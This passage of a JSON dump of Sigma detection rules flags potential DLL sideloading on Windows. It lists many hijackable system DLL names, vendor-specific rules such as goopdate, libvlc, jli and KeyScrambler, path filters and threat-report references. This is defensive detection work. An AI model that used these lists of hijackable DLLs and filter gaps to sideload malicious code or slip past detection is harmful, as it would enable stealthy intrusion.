    - '\\fvewiz.dll'\n            - '\\fwbase.dll'\n            - '\\fwcfg.dll'\n            - '\\fwpolicyiomgr.dll'\n            - '\\fwpuclnt.dll'\n            - '\\fxsapi.dll'\n            - '\\fxsst.dll'\n            - '\\fxstiff.dll'\n            - '\\getuname.dll'\n            - '\\gpapi.dll'\n            - '\\hid.dll'\n            - '\\hnetmon.dll'\n            - '\\httpapi.dll'\n            - '\\icmp.dll'\n            - '\\idstore.dll'\n            - '\\ieadvpack.dll'\n            - '\\iedkcs32.dll'\n            - '\\iernonce.dll'\n            - '\\iertutil.dll'\n            - '\\ifmon.dll'\n            - '\\ifsutil.dll'\n            - '\\inproclogger.dll'\n            - '\\iphlpapi.dll'\n            - '\\iri.dll'\n            - '\\iscsidsc.dll'\n            - '\\iscsium.dll'\n            - '\\isv.exe_rsaenh.dll'\n            - '\\iumbase.dll'\n            - '\\iumsdk.dll'\n            - '\\joinutil.dll'\n            - '\\kdstub.dll'\n            - '\\ksuser.dll'\n            - '\\ktmw32.dll'\n            - '\\licensemanagerapi.dll'\n            - '\\licensingdiagspp.dll'\n            - '\\linkinfo.dll'\n            - '\\loadperf.dll'\n            - '\\lockhostingframework.dll'\n            - '\\logoncli.dll'\n            - '\\logoncontroller.dll'\n            - '\\lpksetupproxyserv.dll'\n            - '\\lrwizdll.dll'\n            - '\\magnification.dll'\n            - '\\maintenanceui.dll'\n            - '\\mapistub.dll'\n            - '\\mbaexmlparser.dll'\n            - '\\mdmdiagnostics.dll'\n            - '\\mfc42u.dll'\n            - '\\mfcore.dll'\n            - '\\mfplat.dll'\n            - '\\mi.dll'\n            - '\\midimap.dll'\n            - '\\mintdh.dll'\n            - '\\miutils.dll'\n            - '\\mlang.dll'\n            - '\\mmdevapi.dll'\n            - '\\mobilenetworking.dll'\n            - '\\mpr.dll'\n            - '\\mprapi.dll'\n            - '\\mrmcorer.dll'\n            - '\\msacm32.dll'\n            - '\\mscms.dll'\n            - '\\mscoree.dll'\n            - '\\msctf.dll'\n            - '\\msctfmonitor.dll'\n            - '\\msdrm.dll'\n            - '\\msdtctm.dll'\n            - '\\msftedit.dll'\n            - '\\msi.dll'\n            - '\\msiso.dll'\n            - '\\msutb.dll'\n            - '\\msvcp110_win.dll'\n            - '\\mswb7.dll'\n            - '\\mswsock.dll'\n            - '\\msxml3.dll'\n            - '\\mtxclu.dll'\n            - '\\napinsp.dll'\n            - '\\ncrypt.dll'\n            - '\\ndfapi.dll'\n            - '\\netapi32.dll'\n            - '\\netid.dll'\n            - '\\netiohlp.dll'\n            - '\\netjoin.dll'\n            - '\\netplwiz.dll'\n            - '\\netprofm.dll'\n            - '\\netprovfw.dll'\n            - '\\netsetupapi.dll'\n            - '\\netshell.dll'\n            - '\\nettrace.dll'\n            - '\\netutils.dll'\n            - '\\networkexplorer.dll'\n            - '\\newdev.dll'\n            - '\\ninput.dll'\n            - '\\nlaapi.dll'\n            - '\\nlansp_c.dll'\n            - '\\npmproxy.dll'\n            - '\\nshhttp.dll'\n            - '\\nshipsec.dll'\n            - '\\nshwfp.dll'\n            - '\\ntdsapi.dll'\n            - '\\ntlanman.dll'\n            - '\\ntlmshared.dll'\n            - '\\ntmarta.dll'\n            - '\\ntshrui.dll'\n            - '\\oleacc.dll'\n            - '\\omadmapi.dll'\n            - '\\onex.dll'\n            - '\\opcservices.dll'\n            - '\\osbaseln.dll'\n            - '\\osksupport.dll'\n            - '\\osuninst.dll'\n            - '\\p2p.dll'\n            - '\\p2pnetsh.dll'\n            - '\\p9np.dll'\n            - '\\pcaui.dll'\n            - '\\pdh.dll'\n            - '\\peerdistsh.dll'\n            - '\\pkeyhelper.dll'\n            - '\\pla.dll'\n            - '\\playsndsrv.dll'\n            - '\\pnrpnsp.dll'\n            - '\\policymanager.dll'\n            - '\\polstore.dll'\n            - '\\powrprof.dll'\n            - '\\printui.dll'\n            - '\\prntvpt.dll'\n            - '\\profapi.dll'\n            - '\\propsys.dll'\n            - '\\proximitycommon.dll'\n            - '\\proximityservicepal.dll'\n            - '\\prvdmofcomp.dll'\n            - '\\puiapi.dll'\n            - '\\radcui.dll'\n            - '\\rasapi32.dll'\n            - '\\rasdlg.dll'\n            - '\\rasgcw.dll'\n            - '\\rasman.dll'\n            - '\\rasmontr.dll'\n            - '\\reagent.dll'\n            - '\\regapi.dll'\n            - '\\reseteng.dll'\n            - '\\resetengine.dll'\n            - '\\resutils.dll'\n            - '\\rmclient.dll'\n            - '\\rpcnsh.dll'\n            - '\\rsaenh.dll'\n            - '\\rtutils.dll'\n            - '\\rtworkq.dll'\n            - '\\samcli.dll'\n            - '\\samlib.dll'\n            - '\\sapi_onecore.dll'\n            - '\\sas.dll'\n            - '\\scansetting.dll'\n            - '\\scecli.dll'\n            - '\\schedcli.dll'\n            - '\\secur32.dll'\n            - '\\security.dll'\n            - '\\sensapi.dll'\n            - '\\shell32.dll'\n            - '\\shfolder.dll'\n            - '\\slc.dll'\n            - '\\snmpapi.dll'\n            - '\\spectrumsyncclient.dll'\n            - '\\spp.dll'\n            - '\\sppc.dll'\n            - '\\sppcext.dll'\n            - '\\srclient.dll'\n            - '\\srcore.dll'\n            - '\\srmtrace.dll'\n            - '\\srpapi.dll'\n            - '\\srvcli.dll'\n            - '\\ssp_isv.exe_rsaenh.dll'\n            - '\\ssp.exe_rsaenh.dll'\n            - '\\sspicli.dll'\n            - '\\ssshim.dll'\n            - '\\staterepository.core.dll'\n            - '\\structuredquery.dll'\n            - '\\sxshared.dll'\n            - '\\systemsettingsthresholdadminflowui.dll'\n            - '\\tapi32.dll'\n            - '\\tbs.dll'\n            - '\\tdh.dll'\n            - '\\textshaping.dll'\n            - '\\timesync.dll'\n            - '\\tpmcoreprovisioning.dll'\n            - '\\tquery.dll'\n            - '\\tsworkspace.dll'\n            - '\\ttdrecord.dll'\n            - '\\twext.dll'\n            - '\\twinapi.dll'\n            - '\\twinui.appcore.dll'\n            - '\\uianimation.dll'\n            - '\\uiautomationcore.dll'\n            - '\\uireng.dll'\n            - '\\uiribbon.dll'\n            - '\\umpdc.dll'\n            - '\\unattend.dll'\n            - '\\updatepolicy.dll'\n            - '\\upshared.dll'\n            - '\\urlmon.dll'\n            - '\\userenv.dll'\n            - '\\utildll.dll'\n            - '\\uxinit.dll'\n            - '\\uxtheme.dll'\n            - '\\vaultcli.dll'\n            - '\\vdsutil.dll'\n            - '\\version.dll'\n            - '\\virtdisk.dll'\n            - '\\vssapi.dll'\n            - '\\vsstrace.dll'\n            - '\\wbemprox.dll'\n            - '\\wbemsvc.dll'\n            - '\\wcmapi.dll'\n            - '\\wcnnetsh.dll'\n            - '\\wdi.dll'\n            - '\\wdscore.dll'\n            - '\\webservices.dll'\n            - '\\wecapi.dll'\n            - '\\wer.dll'\n            - '\\wevtapi.dll'\n            - '\\whhelper.dll'\n            - '\\wimgapi.dll'\n            - '\\winbio.dll'\n            - '\\winbrand.dll'\n            - '\\windows.storage.dll'\n            - '\\windows.storage.search.dll'\n            - '\\windows.ui.immersive.dll'\n            - '\\windowscodecs.dll'\n            - '\\windowscodecsext.dll'\n            - '\\windowsudk.shellcommon.dll'\n            - '\\winhttp.dll'\n            - '\\wininet.dll'\n            - '\\winipsec.dll'\n            - '\\winmde.dll'\n            - '\\winmm.dll'\n            - '\\winnsi.dll'\n            - '\\winrnr.dll'\n            - '\\winscard.dll'\n            - '\\winsqlite3.dll'\n            - '\\winsta.dll'\n            - '\\winsync.dll'\n            - '\\wkscli.dll'\n            - '\\wlanapi.dll'\n            - '\\wlancfg.dll'\n            - '\\wldp.dll'\n            - '\\wlidprov.dll'\n            - '\\wmiclnt.dll'\n            - '\\wmidcom.dll'\n            - '\\wmiutils.dll'\n            - '\\wmpdui.dll'\n            - '\\wmsgapi.dll'\n            - '\\wofutil.dll'\n            - '\\wpdshext.dll'\n            - '\\wscapi.dll'\n            - '\\wsdapi.dll'\n            - '\\wshbth.dll'\n            - '\\wshelper.dll'\n            - '\\wsmsvc.dll'\n            - '\\wtsapi32.dll'\n            - '\\wwancfg.dll'\n            - '\\wwapi.dll'\n            - '\\xmllite.dll'\n            - '\\xolehlp.dll'\n            - '\\xpsservices.dll'\n            - '\\xwizards.dll'\n            - '\\xwtpw32.dll'\n            # From https://github.com/XForceIR/SideLoadHunter/blob/main/SideLoads/README.md\n            - '\\amsi.dll'\n            - '\\appraiser.dll'\n            - '\\COMRES.DLL'\n            - '\\cryptnet.dll'\n            - '\\DispBroker.dll'\n            - '\\dsound.dll'\n            - '\\dxilconv.dll'\n            - '\\FxsCompose.dll'\n            - '\\FXSRESM.DLL'\n            - '\\msdtcVSp1res.dll'\n            - '\\PrintIsolationProxy.dll'\n            - '\\rdpendp.dll'\n            - '\\rpchttp.dll'\n            - '\\storageusage.dll'\n            - '\\utcutil.dll'\n            - '\\WfsR.dll'\n            # The DLLs below exist in the \"C:\\Windows\\System32\\DriverStore\\FileRepository\\\" folder, but there is also a copy located in \"C:\\ProgramData\\Package Cache\\XXXXXXX\\Graphics\\\". If you see them being loaded from there, please comment them out; don't add a filter for ProgramData :)\n            - '\\igd10iumd64.dll'\n            - '\\igd12umd64.dll'\n            - '\\igdumdim64.dll'\n            - '\\igdusc64.dll'\n            # Other\n            - '\\TSMSISrv.dll'\n            - '\\TSVIPSrv.dll'\n            - '\\wbemcomn.dll'\n            - '\\WLBSCTRL.dll'\n            - '\\wow64log.dll'\n            - '\\WptsExtensions.dll'\n    filter_main_generic:\n        # Note: this filter is generic on purpose, to avoid an insane amount of FPs from legitimate third-party applications. A better approach would be to baseline everything and add specific filters to avoid blind spots.\n        ImageLoaded|contains:\n            - 'C:\\$WINDOWS.~BT\\'\n            - 'C:\\$WinREAgent\\'\n            - 'C:\\Windows\\SoftwareDistribution\\'\n            - 'C:\\Windows\\System32\\'\n            - 'C:\\Windows\\SystemTemp\\'\n            - 'C:\\Windows\\SysWOW64\\'\n            - 'C:\\Windows\\WinSxS\\'\n            - 'C:\\Windows\\SyChpe32\\' # “hybrid” binaries containing x86-to-ARM stubs to improve the x86 emulation performance\n    filter_main_windows_temp:\n        ImageLoaded|startswith: 'C:\\Windows\\Temp\\'\n        Image|startswith:\n            - 'C:\\Windows\\WinSxS\\arm64'\n            - 'C:\\Windows\\UUS\\arm64\\'\n        Image|endswith:\n            - '\\TiWorker.exe'\n            - '\\wuaucltcore.exe'\n    filter_main_dot_net:\n        ImageLoaded|startswith: 'C:\\Windows\\Microsoft.NET\\'\n        ImageLoaded|endswith: '\\cscui.dll'\n    filter_main_defender:\n        ImageLoaded|startswith: 'C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\'\n        ImageLoaded|endswith: '\\version.dll'\n    filter_main_directx:\n        ImageLoaded|startswith: 'C:\\Program Files\\WindowsApps\\Microsoft.DirectXRuntime_'\n        ImageLoaded|endswith: '\\d3dx9_43.dll'\n    filter_optional_exchange:\n        ImageLoaded|startswith: 'C:\\Program Files\\Microsoft\\Exchange Server\\'\n        ImageLoaded|endswith: '\\mswb7.dll'\n    filter_optional_arsenal_image_mounter:\n        ImageLoaded|startswith: 'C:\\Program Files\\Arsenal-Image-Mounter-'\n        ImageLoaded|endswith:\n            - '\\mi.dll'\n            - '\\miutils.dll' # Fixed: '\\miutils.dl' could never match the selection's '\\miutils.dll' entry\n    filter_optional_office_appvpolicy:\n        Image: 'C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeClickToRun.exe'\n        ImageLoaded: 'C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVPolicy.dll'\n    filter_optional_azure:\n        ImageLoaded|startswith: 'C:\\Packages\\Plugins\\Microsoft.GuestConfiguration.ConfigurationforWindows\\'\n    filter_optional_dell:\n        Image|contains:\n            - 'C:\\Program Files\\WindowsApps\\DellInc.DellSupportAssistforPCs'\n            - 'C:\\Windows\\System32\\backgroundTaskHost.exe'\n        ImageLoaded|startswith: 'C:\\Program Files\\WindowsApps\\DellInc.DellSupportAssistforPCs'\n    filter_optional_dell_wldp:\n        Image|startswith: 'C:\\Program Files\\WindowsApps\\DellInc.DellSupportAssistforPCs'\n        Image|endswith: '\\wldp.dll'\n    filter_optional_checkpoint:\n        Image|startswith:\n            - 'C:\\Program Files\\CheckPoint\\'\n            - 'C:\\Program Files (x86)\\CheckPoint\\'\n        Image|endswith: '\\SmartConsole.exe'\n        ImageLoaded|startswith:\n            - 'C:\\Program Files\\CheckPoint\\'\n            - 'C:\\Program Files (x86)\\CheckPoint\\'\n        ImageLoaded|endswith: '\\PolicyManager.dll'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Legitimate applications loading their own versions of the DLLs mentioned in this rule\nlevel: high\n"
  },
  {
    "path": "rules/windows/image_load/image_load_side_load_goopdate.yml",
    "content": "title: Potential Goopdate.DLL Sideloading\nid: b6188d2f-b3c4-4d2c-a17d-9706e0851af0\nstatus: test\ndescription: Detects potential DLL sideloading of \"goopdate.dll\", a DLL used by googleupdate.exe\nreferences:\n    - https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/goofy-guineapig/NCSC-MAR-Goofy-Guineapig.pdf\nauthor: X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-15\nmodified: 2025-10-07\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1574.001\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        ImageLoaded|endswith: '\\goopdate.dll'\n    filter_main_generic:\n        ImageLoaded|startswith:\n            # Many third-party Chromium-based apps use this DLL. It's better to create a baseline and add specific filters.\n            - 'C:\\Program Files (x86)\\'\n            - 'C:\\Program Files\\'\n    filter_optional_dropbox_installer_temp:\n        Image|contains|all:\n            - '\\AppData\\Local\\Temp\\GUM'\n            - '.tmp\\Dropbox'\n        ImageLoaded|contains|all:\n            - '\\AppData\\Local\\Temp\\GUM'\n            - '.tmp\\goopdate.dll'\n    filter_optional_googleupdate_temp:\n        Image|contains:\n            - '\\AppData\\Local\\Temp\\GUM'\n            - ':\\Windows\\SystemTemp\\GUM'\n        Image|endswith: '.tmp\\GoogleUpdate.exe'\n        ImageLoaded|contains:\n            - '\\AppData\\Local\\Temp\\GUM'\n            - ':\\Windows\\SystemTemp\\GUM'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - False positives are expected from Google Chrome installations running from user locations (AppData) and other custom locations. Apply additional filters accordingly.\n    - Other third-party Chromium browsers located in AppData\nlevel: medium\n"
  },
  {
    "path": "rules/windows/image_load/image_load_side_load_gup_libcurl.yml",
    "content": "title: Potential DLL Sideloading Of Libcurl.DLL Via GUP.EXE\nid: e49b5745-1064-4ac1-9a2e-f687bc2dd37e\nstatus: test\ndescription: Detects potential DLL sideloading of \"libcurl.dll\" by the \"gup.exe\" process from an uncommon location\nreferences:\n    - https://labs.withsecure.com/publications/fin7-target-veeam-servers\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-05\ntags:\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1574.001\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\gup.exe'\n        ImageLoaded|endswith: '\\libcurl.dll'\n    filter_main_notepad_plusplus:\n        Image|endswith: '\\Notepad++\\updater\\GUP.exe'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/image_load/image_load_side_load_iviewers.yml",
    "content": "title: Potential Iviewers.DLL Sideloading\nid: 4c21b805-4dd7-469f-b47d-7383a8fcb437\nstatus: test\ndescription: Detects potential DLL sideloading of \"iviewers.dll\" (OLE/COM Object Interface Viewer)\nreferences:\n    - https://www.secureworks.com/research/shadowpad-malware-analysis\nauthor: X__Junior (Nextron Systems)\ndate: 2023-03-21\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1574.001\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        ImageLoaded|endswith: '\\iviewers.dll'\n    filter:\n        ImageLoaded|startswith:\n            - 'C:\\Program Files (x86)\\Windows Kits\\'\n            - 'C:\\Program Files\\Windows Kits\\'\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/image_load/image_load_side_load_jli.yml",
    "content": "title: Potential JLI.dll Side-Loading\nid: 7a3b6d1f-4a2b-4f8c-9d7e-e9f8cbf21a35\nstatus: experimental\ndescription: |\n    Detects potential DLL side-loading of jli.dll.\n    JLI.dll has been observed being side-loaded by Java processes by various threat actors, including APT41, XWorm,\n    and others, in order to load malicious payloads in the context of legitimate Java processes.\nreferences:\n    - https://securelist.com/apt41-in-africa/116986/\n    - https://lab52.io/blog/snake-keylogger-in-geopolitical-affairs-abuse-of-trusted-java-utilities-in-cybercrime-operations/\n    - https://hijacklibs.net/entries/3rd_party/oracle/jli.html\n    - https://www.proofpoint.com/us/blog/threat-insight/phish-china-aligned-espionage-actors-ramp-up-taiwan-semiconductor-targeting\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-07-25\nmodified: 2025-10-06\ntags:\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1574.001\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        ImageLoaded|endswith: '\\jli.dll'\n    filter_main_legitimate_install_paths:\n        ImageLoaded|startswith:\n            # Keeping the paths generic, as jli.dll was found inside various directories of installed software\n            - 'C:\\Program Files\\'\n            - 'C:\\Program Files (x86)\\'\n        Description: 'OpenJDK Platform binary'\n        OriginalFileName: 'jli.dll'\n        Product|startswith: 'OpenJDK Platform'\n        Signed: 'true'\n    filter_optional_eclipse:\n        ImageLoaded|startswith: 'C:\\eclipse\\plugins\\'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/image_load/image_load_side_load_jsschhlp.yml",
    "content": "title: Potential DLL Sideloading Via JsSchHlp\nid: 68654bf0-4412-43d5-bfe8-5eaa393cd939\nstatus: test\ndescription: Detects potential DLL sideloading via the JUSTSYSTEMS Japanese word processor\nreferences:\n    - https://www.welivesecurity.com/2022/12/14/unmasking-mirrorface-operation-liberalface-targeting-japanese-political-entities/\n    - http://www.windowexe.com/bbs/board.php?q=jsschhlp-exe-c-program-files-common-files-justsystem-jsschhlp-jsschhlp\nauthor: frack113\ndate: 2022-12-14\ntags:\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1574.001\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        ImageLoaded|endswith: '\\JSESPR.dll'\n    filter:\n        ImageLoaded|startswith: 'C:\\Program Files\\Common Files\\Justsystem\\JsSchHlp\\'\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/image_load/image_load_side_load_keyscrambler.yml",
    "content": "title: Potential DLL Sideloading Of KeyScramblerIE.DLL Via KeyScrambler.EXE\nid: d2451be2-b582-4e15-8701-4196ac180260\nrelated:\n    - id: ca5583e9-8f80-46ac-ab91-7f314d13b984\n      type: similar\nstatus: test\ndescription: |\n    Detects potential DLL side loading of \"KeyScramblerIE.dll\" by \"KeyScrambler.exe\".\n    Various threat actors and malware have been found side loading a masqueraded \"KeyScramblerIE.dll\" through \"KeyScrambler.exe\".\nreferences:\n    - https://thehackernews.com/2024/03/two-chinese-apt-groups-ramp-up-cyber.html\n    - https://csirt-cti.net/2024/02/01/stately-taurus-continued-new-information-on-cyberespionage-attacks-against-myanmar-military-junta/\n    - https://bazaar.abuse.ch/sample/5cb9876681f78d3ee8a01a5aaa5d38b05ec81edc48b09e3865b75c49a2187831/\n    - https://twitter.com/Max_Mal_/status/1775222576639291859\n    - https://twitter.com/DTCERT/status/1712785426895839339\nauthor: Swachchhanda Shrawan Poudel\ndate: 2024-04-15\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1574.001\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        Image|endswith:\n            - '\\KeyScrambler.exe'\n            - '\\KeyScramblerLogon.exe'\n        ImageLoaded|endswith: '\\KeyScramblerIE.dll'\n    filter_main_legitimate_path:\n        Image|contains:\n            - 'C:\\Program Files (x86)\\KeyScrambler\\'\n            - 'C:\\Program Files\\KeyScrambler\\'\n        ImageLoaded|contains:\n            - 'C:\\Program Files (x86)\\KeyScrambler\\'\n            - 'C:\\Program Files\\KeyScrambler\\'\n    filter_main_signature:\n        Signature: 'QFX Software Corporation'\n        SignatureStatus: 'Valid'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/image_load/image_load_side_load_libvlc.yml",
    "content": "title: Potential Libvlc.DLL Sideloading\nid: bf9808c4-d24f-44a2-8398-b65227d406b6\nstatus: test\ndescription: Detects potential DLL sideloading of \"libvlc.dll\", a DLL that is legitimately used by \"VLC.exe\"\nreferences:\n    - https://www.trendmicro.com/en_us/research/23/c/earth-preta-updated-stealthy-strategies.html\n    - https://hijacklibs.net/entries/3rd_party/vlc/libvlc.html\nauthor: X__Junior\ndate: 2023-04-17\ntags:\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1574.001\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        ImageLoaded|endswith: '\\libvlc.dll'\n    filter_main_vlc:\n        ImageLoaded|startswith:\n            - 'C:\\Program Files (x86)\\VideoLAN\\VLC\\'\n            - 'C:\\Program Files\\VideoLAN\\VLC\\'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - False positives are expected if VLC is installed in non-default locations\nlevel: medium\n"
  },
  {
    "path": "rules/windows/image_load/image_load_side_load_mfdetours.yml",
    "content": "title: Potential Mfdetours.DLL Sideloading\nid: d2605a99-2218-4894-8fd3-2afb7946514d\nstatus: test\ndescription: Detects potential DLL sideloading of \"mfdetours.dll\". While using \"mftrace.exe\" it can be abused to attach to an arbitrary process and force load any DLL named \"mfdetours.dll\" from the current directory of execution.\nreferences:\n    - Internal Research\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-08-03\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1574.001\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        ImageLoaded|endswith: '\\mfdetours.dll'\n    filter_main_legit_path:\n        ImageLoaded|contains: ':\\Program Files (x86)\\Windows Kits\\10\\bin\\'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unlikely\nlevel: medium\n"
  },
  {
    "path": "rules/windows/image_load/image_load_side_load_mfdetours_unsigned.yml",
    "content": "title: Unsigned Mfdetours.DLL Sideloading\nid: 948a0953-f287-4806-bbcb-3b2e396df89f\nrelated:\n    - id: d2605a99-2218-4894-8fd3-2afb7946514d\n      type: similar\nstatus: test\ndescription: Detects DLL sideloading of unsigned \"mfdetours.dll\". Executing \"mftrace.exe\" can be abused to attach to an arbitrary process and force load any DLL named \"mfdetours.dll\" from the current directory of execution.\nreferences:\n    - Internal Research\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-08-11\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1574.001\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        ImageLoaded|endswith: '\\mfdetours.dll'\n    filter_main_legit_path:\n        ImageLoaded|contains: ':\\Program Files (x86)\\Windows Kits\\10\\bin\\'\n        SignatureStatus: 'Valid'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/image_load/image_load_side_load_mpsvc.yml",
    "content": "title: Potential DLL Sideloading Of MpSvc.DLL\nid: 5ba243e5-8165-4cf7-8c69-e1d3669654c1\nstatus: test\ndescription: Detects potential DLL sideloading of \"MpSvc.dll\".\nreferences:\n    - https://hijacklibs.net/entries/microsoft/built-in/mpsvc.html\nauthor: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema\ndate: 2024-07-11\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1574.001\nlogsource:\n    product: windows\n    category: image_load\ndetection:\n    selection:\n        ImageLoaded|endswith: '\\MpSvc.dll'\n    filter_main_generic:\n        ImageLoaded|startswith:\n            - 'C:\\Program Files\\Windows Defender\\'\n            - 'C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\'\n            - 'C:\\Windows\\WinSxS\\'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Legitimate applications loading their own versions of the DLL mentioned in this rule.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/image_load/image_load_side_load_mscorsvc.yml",
    "content": "title: Potential DLL Sideloading Of MsCorSvc.DLL\nid: cdb15e19-c2d0-432a-928e-e49c8c60dcf2\nstatus: test\ndescription: Detects potential DLL sideloading of \"mscorsvc.dll\".\nreferences:\n    - https://hijacklibs.net/entries/microsoft/built-in/mscorsvc.html\nauthor: Wietze Beukema\ndate: 2024-07-11\nmodified: 2025-02-26\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1574.001\nlogsource:\n    product: windows\n    category: image_load\ndetection:\n    selection:\n        ImageLoaded|endswith: '\\mscorsvc.dll'\n    filter_main_generic:\n        ImageLoaded|startswith:\n            - 'C:\\Windows\\Microsoft.NET\\Framework\\'\n            - 'C:\\Windows\\Microsoft.NET\\Framework64\\'\n            - 'C:\\Windows\\Microsoft.NET\\FrameworkArm\\'\n            - 'C:\\Windows\\Microsoft.NET\\FrameworkArm64\\'\n            - 'C:\\Windows\\WinSxS\\'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Legitimate applications loading their own versions of the DLL mentioned in this rule.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/image_load/image_load_side_load_non_existent_dlls.yml",
    "content": "title: Potential DLL Sideloading Of Non-Existent DLLs From System Folders\nid: 6b98b92b-4f00-4f62-b4fe-4d1920215771\nrelated:\n    - id: df6ecb8b-7822-4f4b-b412-08f524b4576c # FileEvent rule\n      type: similar\n    - id: 602a1f13-c640-4d73-b053-be9a2fa58b77\n      type: obsolete\nstatus: test\ndescription: |\n    Detects loading of specific system DLL files that are usually not present on the system (or at least not in system directories) but may be loaded by legitimate processes, potentially indicating phantom DLL hijacking attempts.\n    Phantom DLL hijacking involves placing malicious DLLs with names of non-existent system binaries in locations where legitimate applications may search for them, leading to execution of the malicious DLLs.\nreferences:\n    - http://remoteawesomethoughts.blogspot.com/2019/05/windows-10-task-schedulerservice.html\n    - https://clement.notin.org/blog/2020/09/12/CVE-2020-7315-McAfee-Agent-DLL-injection/\n    - https://decoded.avast.io/martinchlumecky/png-steganography/\n    - https://github.com/Wh04m1001/SysmonEoP\n    - https://itm4n.github.io/cdpsvc-dll-hijacking/\n    - https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992\n    - https://securelist.com/passiveneuron-campaign-with-apt-implants-and-cobalt-strike/117745/\n    - https://www.crowdstrike.com/en-us/blog/4-ways-adversaries-hijack-dlls/\n    - https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/\n    - https://www.hexacorn.com/blog/2025/06/14/wermgr-exe-boot-offdmpsvc-dll-lolbin/\n    - https://www.hexacorn.com/blog/2025/06/14/wpr-exe-boottrace-phantom-dll-axeonoffhelper-dll-lolbin/\n    - https://x.com/0gtweet/status/1564131230941122561\nauthor: Nasreddine Bencherchali (Nextron Systems), SBousseaden\ndate: 2022-12-09\nmodified: 2026-01-24\ntags:\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1574.001\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        ImageLoaded|endswith:\n            # Add other DLLs\n            - ':\\Windows\\System32\\axeonoffhelper.dll'\n            - ':\\Windows\\System32\\cdpsgshims.dll'\n            - ':\\Windows\\System32\\oci.dll'\n            - ':\\Windows\\System32\\offdmpsvc.dll'\n            - ':\\Windows\\System32\\shellchromeapi.dll'\n            - ':\\Windows\\System32\\TSMSISrv.dll'\n            - ':\\Windows\\System32\\TSVIPSrv.dll'\n            - ':\\Windows\\System32\\wbem\\wbemcomn.dll'\n            - ':\\Windows\\System32\\WLBSCTRL.dll'\n            - ':\\Windows\\System32\\wow64log.dll'\n            - ':\\Windows\\System32\\WptsExtensions.dll'\n    filter_main_ms_signed:\n        Signed: 'true'\n        SignatureStatus: 'Valid'\n        # There could be other signatures (please add when found)\n        Signature: 'Microsoft Windows'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/image_load/image_load_side_load_office_dlls.yml",
